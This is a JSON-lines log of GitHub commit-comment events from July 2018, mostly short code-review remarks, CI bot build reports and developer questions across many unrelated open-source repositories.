{"id":"7940308782","type":"CommitCommentEvent","actor":{"login":"PepeAmpere"},"repo":{"name":"spring1944/spring1944"},"payload":{"comment":{"id":29648295,"position":null,"line":null,"path":null,"commit_id":"f67e7d460edb9872cd4ccc3fc6dbe8bdd5339e8b","created_at":"2018-07-09T21:54:18Z","updated_at":"2018-07-09T21:54:18Z","author_association":"CONTRIBUTOR","body":"@jal76 I hope you are just kidding? What kind of partisanship is this? What kind of culture of cooperation you introduce with this? "}},"created_at":"2018-07-09T21:54:18Z"}
{"id":"7940308838","type":"CommitCommentEvent","actor":{"login":"awol7a"},"repo":{"name":"awol7a/mc"},"payload":{"comment":{"id":29648296,"position":null,"line":null,"path":null,"commit_id":"e51ecd8667446be3da890f8108791a462ebdb3ab","created_at":"2018-07-09T21:54:18Z","updated_at":"2018-07-09T21:54:18Z","author_association":"OWNER","body":"Nog wasf"}},"created_at":"2018-07-09T21:54:18Z"}
{"id":"7940309331","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648298,"position":5,"line":3576,"path":"lib/LaTeXML/Package/TeX.pool.ltxml","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:54:25Z","updated_at":"2018-07-09T21:54:25Z","author_association":"NONE","body":"Besides using ToString, would probably be better to defer the ToString till the error case, below, so that we don't create the string unless it's used -- minor efficiency."}},"created_at":"2018-07-09T21:54:25Z"}
{"id":"7940311918","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29648303,"position":null,"line":null,"path":null,"commit_id":"60f3af988eae0662725cf57c007ecec14b1c0389","created_at":"2018-07-09T21:55:05Z","updated_at":"2018-07-09T21:55:05Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servn](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servn).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servn-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T21:55:05Z"}
{"id":"7940312734","type":"CommitCommentEvent","actor":{"login":"mjmacleod"},"repo":{"name":"mjmacleod/yiimp"},"payload":{"comment":{"id":29648309,"position":8,"line":401,"path":"stratum/coind_template.cpp","commit_id":"220e14ef898d641f98a95e404be348b7350950dd","created_at":"2018-07-09T21:55:17Z","updated_at":"2018-07-09T21:55:17Z","author_association":"OWNER","body":"I'm not entirely sure why you think this will crash anything, pow2_aux_1 is a std::string object (not a char*) into which the char* data from json_get_string is copied (it isn't a pointer it will actually copy the data).\r\n\r\nPerhaps I'm missing something, if so please feel free to provide more info."}},"created_at":"2018-07-09T21:55:17Z"}
{"id":"7940313829","type":"CommitCommentEvent","actor":{"login":"shashankgupta06"},"repo":{"name":"shashankgupta06/Pokemon-Game"},"payload":{"comment":{"id":29648314,"position":null,"line":null,"path":null,"commit_id":"e6e38da71fdbdb248cfab9f811d156fd2e81a23b","created_at":"2018-07-09T21:55:34Z","updated_at":"2018-07-09T21:55:34Z","author_association":"OWNER","body":"Space lines"}},"created_at":"2018-07-09T21:55:34Z"}
{"id":"7940314604","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648315,"position":158,"line":124,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:55:45Z","updated_at":"2018-07-09T21:55:45Z","author_association":"NONE","body":"anyone asserting for this error?"}},"created_at":"2018-07-09T21:55:45Z"}
{"id":"7940316762","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29648318,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T21:56:18Z","updated_at":"2018-07-09T21:56:18Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2785 of 2973 tests passed, 88 test warnings)\n\nMessages:\n\n * 227 tests had: EIO diffs.\n * 75 tests had: ESO big diffs.\n * 174 tests had: Table big diffs.\n * 11 tests had: AUD diffs.\n * 167 tests had: ESO small diffs.\n * 103 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 45 tests had: Table small diffs.\n * 15 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 455\n * Failed: 188\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.68%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T21:56:18Z"}
{"id":"7940320028","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29648322,"position":5,"line":4,"path":"Updates/1589_black_morass_templates.sql","commit_id":"79151fd36b0980e5f1ea9a0170accecb3755993c","created_at":"2018-07-09T21:57:05Z","updated_at":"2018-07-09T21:57:05Z","author_association":"COLLABORATOR","body":"and db (on startup) throws error ...that he cannot be involved with quests...\r\nYou can simply remove his flags using acid or dbscript... on spawn"}},"created_at":"2018-07-09T21:57:05Z"}
{"id":"7940320253","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29648323,"position":null,"line":null,"path":null,"commit_id":"437b1234d4f0fdf87f7f56128dea16e26dc354ab","created_at":"2018-07-09T21:57:09Z","updated_at":"2018-07-09T21:57:09Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servn](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servn).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servn-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T21:57:09Z"}
{"id":"7940320430","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648324,"position":173,"line":130,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:57:11Z","updated_at":"2018-07-09T21:57:11Z","author_association":"NONE","body":"space // Free...."}},"created_at":"2018-07-09T21:57:11Z"}
{"id":"7940321394","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648326,"position":161,"line":127,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:57:24Z","updated_at":"2018-07-09T21:57:24Z","author_association":"NONE","body":"space // halide..."}},"created_at":"2018-07-09T21:57:24Z"}
{"id":"7940321908","type":"CommitCommentEvent","actor":{"login":"sgnoohc"},"repo":{"name":"aminnj/plottery"},"payload":{"comment":{"id":29648328,"position":58,"line":584,"path":"utils.py","commit_id":"19b084197d1c22d0ff6e1260a31401b6342b4b03","created_at":"2018-07-09T21:57:31Z","updated_at":"2018-07-09T21:57:31Z","author_association":"CONTRIBUTOR","body":"What does this mean?"}},"created_at":"2018-07-09T21:57:31Z"}
{"id":"7940325039","type":"CommitCommentEvent","actor":{"login":"essic"},"repo":{"name":"essic/prez-short-why-fsharp"},"payload":{"comment":{"id":29648334,"position":null,"line":null,"path":null,"commit_id":"525b90b8fefde70efaf4c287b0945836e52097f3","created_at":"2018-07-09T21:58:15Z","updated_at":"2018-07-09T21:58:15Z","author_association":"OWNER","body":"Thank you 🙏🏿 "}},"created_at":"2018-07-09T21:58:15Z"}
{"id":"7940325350","type":"CommitCommentEvent","actor":{"login":"Alpvax"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":29648336,"position":8,"line":null,"path":"src/main/java/net/minecraftforge/fml/client/config/IConfigElement.java","commit_id":"92f55097d1168eed0022f0bd889a1b6e71401aea","created_at":"2018-07-09T21:58:20Z","updated_at":"2018-07-09T21:58:20Z","author_association":"NONE","body":"Can we make this default to false to preserve backwards compatibility?"}},"created_at":"2018-07-09T21:58:20Z"}
{"id":"7940328419","type":"CommitCommentEvent","actor":{"login":"slvnperron"},"repo":{"name":"botpress/botpress"},"payload":{"comment":{"id":29648346,"position":null,"line":null,"path":null,"commit_id":"4f15d113788d68dc904f361a40b21ce5007fda0e","created_at":"2018-07-09T21:59:08Z","updated_at":"2018-07-09T21:59:08Z","author_association":"MEMBER","body":"OK that is weird. It should have suggested v11 again. Let’s keep a eye on that"}},"created_at":"2018-07-09T21:59:08Z"}
{"id":"7940331059","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29648354,"position":null,"line":null,"path":null,"commit_id":"6da42fd59166d9d63917fd92d4e2f36f5e70400b","created_at":"2018-07-09T21:59:48Z","updated_at":"2018-07-09T21:59:48Z","author_association":"CONTRIBUTOR","body":"Why using different banches and deleting the \"ffuplink-notunnel-routing-macaddr\" branch?\r\nWhen I did the following I got some conflict\r\n\r\n> git checkout ffuplink-notunnel-routing-macaddr\r\ngit reset --hard freifunk/master\r\ngit cherry-pick 805f81a\r\ngit cherry-pick ab0ec05\r\n\r\ncan you check please"}},"created_at":"2018-07-09T21:59:48Z"}
{"id":"7940332697","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648362,"position":25,"line":25,"path":"src/actions/actions.js","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T22:00:14Z","updated_at":"2018-07-09T22:00:14Z","author_association":"COLLABORATOR","body":"CALL_API is a generic API call and we just need to pass it action types for sent, success and failure."}},"created_at":"2018-07-09T22:00:14Z"}
{"id":"7940334326","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648367,"position":20,"line":20,"path":"src/main/java/movierent/model/dao/MovieDao.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T22:00:36Z","updated_at":"2018-07-09T22:00:36Z","author_association":"NONE","body":"extract to methods"}},"created_at":"2018-07-09T22:00:36Z"}
{"id":"7940334585","type":"CommitCommentEvent","actor":{"login":"bakes1113"},"repo":{"name":"Microsoft/vscode-chrome-debug"},"payload":{"comment":{"id":29648368,"position":null,"line":null,"path":null,"commit_id":"1498c035f45f69c24e979056d45b0f9f3479ae45","created_at":"2018-07-09T22:00:41Z","updated_at":"2018-07-09T22:00:41Z","author_association":"NONE","body":"so can some one help with how I have t0 up load that with chrome please\r\n"}},"created_at":"2018-07-09T22:00:41Z"}
{"id":"7940334876","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648369,"position":45,"line":45,"path":"src/main/java/movierent/model/dao/DBManager.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T22:00:45Z","updated_at":"2018-07-09T22:00:45Z","author_association":"NONE","body":"reverse the condition and swap the body with the return statement"}},"created_at":"2018-07-09T22:00:45Z"}
{"id":"7940335403","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648373,"position":14,"line":14,"path":"src/main/java/movierent/model/dao/DBManager.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T22:00:52Z","updated_at":"2018-07-09T22:00:52Z","author_association":"NONE","body":"tip: never store hard-coded passwords in productive apps. Use dedicated credential stores or pass the values to the jvm e.g. via environment variables."}},"created_at":"2018-07-09T22:00:52Z"}
{"id":"7940335735","type":"CommitCommentEvent","actor":{"login":"vpodzime"},"repo":{"name":"Element104/fedora-minimal"},"payload":{"comment":{"id":29648376,"position":null,"line":null,"path":null,"commit_id":"a004f1245fcc90cec05c3a6c5f0c91193c0c27c0","created_at":"2018-07-09T22:00:57Z","updated_at":"2018-07-09T22:00:57Z","author_association":"NONE","body":"You will miss it when you need to see what some crazy number of bytes actually means. ;)"}},"created_at":"2018-07-09T22:00:57Z"}
{"id":"7940335776","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29648377,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T22:00:58Z","updated_at":"2018-07-09T22:00:58Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T22:00:58Z"}
{"id":"7940336085","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648378,"position":199,"line":149,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T22:01:01Z","updated_at":"2018-07-09T22:01:01Z","author_association":"NONE","body":"do you need both dma_engine and virtual_engine?"}},"created_at":"2018-07-09T22:01:01Z"}
{"id":"7940340110","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648390,"position":37,"line":37,"path":"src/main/java/movierent/model/dao/DBManager.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T22:02:02Z","updated_at":"2018-07-09T22:02:02Z","author_association":"NONE","body":"Not sure if spring is smart enough to detect this as a factory method. Most probably you'll end up with two instances, and using either based on the 'injection' method used to acquire it."}},"created_at":"2018-07-09T22:02:02Z"}
{"id":"7940344807","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":29648407,"position":null,"line":null,"path":null,"commit_id":"6f88d35f70551cb91fded756c5a8ab4209db91c2","created_at":"2018-07-09T22:03:13Z","updated_at":"2018-07-09T22:03:13Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"taskId\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-09T22:03:13.637Z\n\n</details>"}},"created_at":"2018-07-09T22:03:13Z"}
{"id":"7940346129","type":"CommitCommentEvent","actor":{"login":"aminnj"},"repo":{"name":"aminnj/plottery"},"payload":{"comment":{"id":29648410,"position":58,"line":584,"path":"utils.py","commit_id":"19b084197d1c22d0ff6e1260a31401b6342b4b03","created_at":"2018-07-09T22:03:35Z","updated_at":"2018-07-09T22:03:35Z","author_association":"OWNER","body":"\"smart\" legends still don't work for log scaled plots due to a combination of me having a bug probably, and ROOT making it incredibly hard to get consistent coordinates without repainting the canvas every line (and then hoping they don't change in the subsequent code). Here, I'm trying to calculate the physical (linear) y-axis fraction for points given coordinates based in a log scale."}},"created_at":"2018-07-09T22:03:35Z"}
{"id":"7940346393","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29648411,"position":null,"line":null,"path":null,"commit_id":"bd5eb581d35e9779f7cf09172ecf482b38b32763","created_at":"2018-07-09T22:03:39Z","updated_at":"2018-07-09T22:03:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-448](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-448).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-448-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T22:03:39Z"}
{"id":"7940349747","type":"CommitCommentEvent","actor":{"login":"bencodeorg"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":29648421,"position":6,"line":12,"path":"aws/redshift/tables/outreach_stats_by_year.sql","commit_id":"249499ddf8e5b014fd8e66b0851eb837a9ad18d8","created_at":"2018-07-09T22:04:33Z","updated_at":"2018-07-09T22:04:33Z","author_association":"CONTRIBUTOR","body":"Ah, caveat here -- this doesn't exist for CSF, since there's no concept of a \"course\" made up of multiple scripts in CSF-land."}},"created_at":"2018-07-09T22:04:33Z"}
{"id":"7940353200","type":"CommitCommentEvent","actor":{"login":"Troutp2"},"repo":{"name":"treemmett/netlist"},"payload":{"comment":{"id":29648432,"position":null,"line":null,"path":null,"commit_id":"ae3cf80330b188814ef9bb3c7d9ae3a004157485","created_at":"2018-07-09T22:05:31Z","updated_at":"2018-07-09T22:05:31Z","author_association":"COLLABORATOR","body":"Display the first application assigned."}},"created_at":"2018-07-09T22:05:31Z"}
{"id":"7940354010","type":"CommitCommentEvent","actor":{"login":"green77777"},"repo":{"name":"kamranahmedse/driver.js"},"payload":{"comment":{"id":29648433,"position":null,"line":null,"path":null,"commit_id":"ddf83eebb379fd4c74a9209b6e5ed7015677917d","created_at":"2018-07-09T22:05:45Z","updated_at":"2018-07-09T22:05:45Z","author_association":"NONE","body":"ddf83ee"}},"created_at":"2018-07-09T22:05:45Z"}
{"id":"7940354150","type":"CommitCommentEvent","actor":{"login":"vargaz"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29648434,"position":17,"line":154,"path":"sdks/ios/appbuilder/appbuilder.cs","commit_id":"7d65522b2806e350d5f127ac99abaa2dc4ed484f","created_at":"2018-07-09T22:05:47Z","updated_at":"2018-07-09T22:05:47Z","author_association":"MEMBER","body":"Its missing a ','\r\n"}},"created_at":"2018-07-09T22:05:47Z"}
{"id":"7940360921","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648443,"position":24,"line":24,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:07:37Z","updated_at":"2018-07-09T22:07:37Z","author_association":"COLLABORATOR","body":"socketConnect should be the name as java and c++ convention"}},"created_at":"2018-07-09T22:07:37Z"}
{"id":"7940361319","type":"CommitCommentEvent","actor":{"login":"albeanth"},"repo":{"name":"rtrp/osu-transport"},"payload":{"comment":{"id":29648444,"position":null,"line":null,"path":null,"commit_id":"dcf2d2c65cb51d543a32d51731c7157b61dfaab1","created_at":"2018-07-09T22:07:44Z","updated_at":"2018-07-09T22:07:44Z","author_association":"CONTRIBUTOR","body":"https://gph.is/2q1ICxR"}},"created_at":"2018-07-09T22:07:44Z"}
{"id":"7940362003","type":"CommitCommentEvent","actor":{"login":"monsterkodi"},"repo":{"name":"appget/appget.packages"},"payload":{"comment":{"id":29648445,"position":null,"line":null,"path":null,"commit_id":"21e2879fcdfddbffacb58b98f438df405ba92ab1","created_at":"2018-07-09T22:07:56Z","updated_at":"2018-07-09T22:07:56Z","author_association":"CONTRIBUTOR","body":"looks good to me."}},"created_at":"2018-07-09T22:07:56Z"}
{"id":"7940364956","type":"CommitCommentEvent","actor":{"login":"isi-lincoln"},"repo":{"name":"ceftb/engine"},"payload":{"comment":{"id":29648450,"position":null,"line":null,"path":null,"commit_id":"b4d065424580e18aafd97e38eeb635e824727bf4","created_at":"2018-07-09T22:08:47Z","updated_at":"2018-07-09T22:08:47Z","author_association":"MEMBER","body":"on line 649 of master, and 653 of updated api-basic.js should fail (?) based on how CRUD works.\r\n\r\n```\r\nit('delete materialization', function(done) {\r\n     api.delete('/proj/park/xp/lawn/rz/small-world/mz/mz1', tk)\r\n       .expect(200)\r\n       .end(function(err, res) { done(err); });\r\n   });\r\n \r\n   it('get materialization', function(done) {\r\n     api.get('/proj/park/xp/lawn/rz/small-world/mz/mz1', tk)\r\n       .expect(200)\r\n       .expect(function(res) {\r\n \r\n         //console.log(JSON.stringify(res.body, null, '  '));\r\n \r\n         expect(res.body.code).to.equal(0);\r\n \r\n         for (key in res.body.stateboard.value) {\r\n           var o = res.body.stateboard.value[key]\r\n           expect(o.target).to.equal(\"zero\");\r\n         }\r\n \r\n       })\r\n       .end(function(err, res) { done(err); });\r\n   });\r\n```\r\n\r\nMaybe delete here still allows a valid path, but empty response (as it current checks the stateboard to zero), but one would assume that delete would remove the REST path upto mz... making this 404."}},"created_at":"2018-07-09T22:08:47Z"}
{"id":"7940366557","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648454,"position":23,"line":238,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T22:09:15Z","updated_at":"2018-07-09T22:09:15Z","author_association":"NONE","body":"please assess impact of TODO below for async (PR#2576), with this approach"}},"created_at":"2018-07-09T22:09:15Z"}
{"id":"7940369878","type":"CommitCommentEvent","actor":{"login":"qwertychouskie"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29648458,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-09T22:10:09Z","updated_at":"2018-07-09T22:10:09Z","author_association":"CONTRIBUTOR","body":"Any chance of uploading the APKs for the beta version on e.g. Sourceforge?  I don't use the Play Store on any of my phones."}},"created_at":"2018-07-09T22:10:09Z"}
{"id":"7940370693","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648460,"position":111,"line":111,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:10:22Z","updated_at":"2018-07-09T22:10:22Z","author_association":"COLLABORATOR","body":"this function should be name as getConnectedSocket"}},"created_at":"2018-07-09T22:10:22Z"}
{"id":"7940373960","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648462,"position":32,"line":32,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:11:16Z","updated_at":"2018-07-09T22:11:16Z","author_association":"COLLABORATOR","body":"what is fd?"}},"created_at":"2018-07-09T22:11:16Z"}
{"id":"7940374447","type":"CommitCommentEvent","actor":{"login":"frankrolf"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29648463,"position":5,"line":53,"path":"tests/test_cli.py","commit_id":"425c7b07f4994986e0b2f362c7389b960e693934","created_at":"2018-07-09T22:11:24Z","updated_at":"2018-07-09T22:11:24Z","author_association":"MEMBER","body":"FWIW, the `-*-` isn’t even needed.\r\nCan also do `# coding: utf-8`\r\n`>^ᴥ^<`\r\n"}},"created_at":"2018-07-09T22:11:24Z"}
{"id":"7940377561","type":"CommitCommentEvent","actor":{"login":"isi-lincoln"},"repo":{"name":"ceftb/engine"},"payload":{"comment":{"id":29648468,"position":null,"line":null,"path":null,"commit_id":"b4d065424580e18aafd97e38eeb635e824727bf4","created_at":"2018-07-09T22:12:17Z","updated_at":"2018-07-09T22:12:17Z","author_association":"MEMBER","body":"Based on code from https://github.com/ceftb/engine/blob/master/materialize/lib/materialize.go line 88-90. Looks like \r\n\r\n```\r\nfor _, s := range sb.Value {\r\n\t\ts.Target = \"zero\"\r\n}\r\n```\r\n\r\ndelete == dematerialize."}},"created_at":"2018-07-09T22:12:17Z"}
{"id":"7940382273","type":"CommitCommentEvent","actor":{"login":"risrivas"},"repo":{"name":"risrivas/website"},"payload":{"comment":{"id":29648480,"position":1,"line":1,"path":"lipsum.txt","commit_id":"9805d9dfc34a192d5d684f1f8b84195e1889b5e8","created_at":"2018-07-09T22:13:40Z","updated_at":"2018-07-09T22:13:40Z","author_association":"OWNER","body":"### Lipsum Really?\r\n\r\nSo we....... really...... were not able to find better filler text?"}},"created_at":"2018-07-09T22:13:40Z"}
{"id":"7940385870","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648485,"position":49,"line":49,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:14:41Z","updated_at":"2018-07-09T22:14:41Z","author_association":"COLLABORATOR","body":"refactor:\r\nkeyword = argv[1] \r\nwordCount = wordCounter \r\n"}},"created_at":"2018-07-09T22:14:41Z"}
{"id":"7940387329","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29648489,"position":5,"line":53,"path":"tests/test_cli.py","commit_id":"425c7b07f4994986e0b2f362c7389b960e693934","created_at":"2018-07-09T22:15:04Z","updated_at":"2018-07-09T22:15:04Z","author_association":"COLLABORATOR","body":"Sure, it just didn’t seem to be worth the trouble of looking up the right syntax, but I have it now :)"}},"created_at":"2018-07-09T22:15:04Z"}
{"id":"7940389086","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648495,"position":36,"line":36,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:15:33Z","updated_at":"2018-07-09T22:15:33Z","author_association":"COLLABORATOR","body":"for this whole iteration make and output prints resolution please refactor to separated function"}},"created_at":"2018-07-09T22:15:33Z"}
{"id":"7940389542","type":"CommitCommentEvent","actor":{"login":"EthanBullVulpe"},"repo":{"name":"EthanBullVulpe/potential_fitting"},"payload":{"comment":{"id":29648496,"position":null,"line":null,"path":null,"commit_id":"f36e6917253a5b64d60750ae20c8850eb910a964","created_at":"2018-07-09T22:15:40Z","updated_at":"2018-07-09T22:15:40Z","author_association":"OWNER","body":"I don't know why this merge was needed... nothing was changed?"}},"created_at":"2018-07-09T22:15:40Z"}
{"id":"7940392422","type":"CommitCommentEvent","actor":{"login":"mjmacleod"},"repo":{"name":"mjmacleod/yiimp"},"payload":{"comment":{"id":29648503,"position":8,"line":401,"path":"stratum/coind_template.cpp","commit_id":"220e14ef898d641f98a95e404be348b7350950dd","created_at":"2018-07-09T22:16:26Z","updated_at":"2018-07-09T22:16:26Z","author_association":"OWNER","body":"Nevermind, I see json_get_string returns NULL for empty, I pushed another commit to clean that up."}},"created_at":"2018-07-09T22:16:26Z"}
{"id":"7940394177","type":"CommitCommentEvent","actor":{"login":"EthanBullVulpe"},"repo":{"name":"paesanilab/potential_fitting"},"payload":{"comment":{"id":29648506,"position":null,"line":null,"path":null,"commit_id":"f36e6917253a5b64d60750ae20c8850eb910a964","created_at":"2018-07-09T22:16:56Z","updated_at":"2018-07-09T22:16:56Z","author_association":"COLLABORATOR","body":"I don't know why this commit was created. Why did git require a merge when no files were changed?"}},"created_at":"2018-07-09T22:16:56Z"}
{"id":"7940399240","type":"CommitCommentEvent","actor":{"login":"isi-lincoln"},"repo":{"name":"ceftb/engine"},"payload":{"comment":{"id":29648522,"position":null,"line":null,"path":null,"commit_id":"b4d065424580e18aafd97e38eeb635e824727bf4","created_at":"2018-07-09T22:18:26Z","updated_at":"2018-07-09T22:18:26Z","author_association":"MEMBER","body":"This is something we can talk about, but based on the comments from the openapi.yml\r\n\r\n```\r\n    delete:\r\n      summary: Delete a realization\r\n      operationId: deleteRealization\r\n      parameters:\r\n        - name: authorization\r\n          description: API access authorization in JWT access token format\r\n          in: header\r\n          type: string\r\n          required: true\r\n\r\n        - name: pid\r\n          description: 'id of the project to which the experiment belongs'\r\n          type: string\r\n          in: path\r\n          required: true\r\n\r\n        - name: eid\r\n          description: 'id of the experiment to which the realization belongs'\r\n          type: string\r\n          in: path\r\n          required: true\r\n\r\n        - name: rid\r\n          description: 'id of the realization to delete'\r\n          type: string\r\n          in: path\r\n          required: true\r\n      responses:\r\n        '200':\r\n          description: The realization has been deleted\r\n        '404':\r\n          description: >\r\n            The provided eid/pid/rid combo is not found\r\n        '403':\r\n          description: |\r\n            The requestor does not have permission to delete the realization\r\n        '401':\r\n```\r\nI think the correct behavior for delete is to not just dematerialize, but to also delete the stateboard for that entry, in this manner the tests are reproducible. "}},"created_at":"2018-07-09T22:18:26Z"}
{"id":"7940402410","type":"CommitCommentEvent","actor":{"login":"kayone"},"repo":{"name":"appget/appget.packages"},"payload":{"comment":{"id":29648529,"position":null,"line":null,"path":null,"commit_id":"21e2879fcdfddbffacb58b98f438df405ba92ab1","created_at":"2018-07-09T22:19:20Z","updated_at":"2018-07-09T22:19:20Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-09T22:19:20Z"}
